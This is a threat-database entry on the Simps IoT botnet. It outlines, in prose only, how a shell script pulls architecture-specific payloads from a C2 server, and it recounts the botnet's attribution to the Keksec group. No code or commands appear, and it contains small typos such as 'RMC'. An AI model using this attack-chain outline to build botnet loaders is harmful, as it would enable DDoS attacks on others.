Threat Database Botnets Simps Botnet

Simps Botnet

A new botnet named Simps focused on carrying out DDOS (Distributed Denial of Service) attacks has been detected by infosec researchers. The attack chain that delivers the Simps payload to the compromised IoT (Internet of Things) device ultimately, begins with a corrupted shell script. The script is tasked with delivering next-stage payloads for several different *nix architectures. The payloads are fetched from the same Command-and-Control (C2, C&C) URL that was used to drop the shell script itself. Additionally, the script can change permissions using chmod or delete selected payloads through the rm command. An alternate attack chain uses Gafgyt and exploits RMC (Remote Code Execution) vulnerabilities.

The Simps Botnet is Attributed to the Keksec Group

The criminals responsible for deploying the Simps botnet have created their own Youtube channel and the Discord server apparently. The Youtube channel seems to be used to demonstrate the capabilities of the botnet and promote it. It also contained a link to the Discord server, where infosec researchers found several discussions about various DDOS activities and different botnets. This led to the discovery of several links that connected the Simps botnet with the Keksec, or Kek Security, hacker group. Keksec has been known for operating HybridMQ-keksec previously, A DDOS Trojan that used the source code of Mirai and Gagyt as its basis.


Most Viewed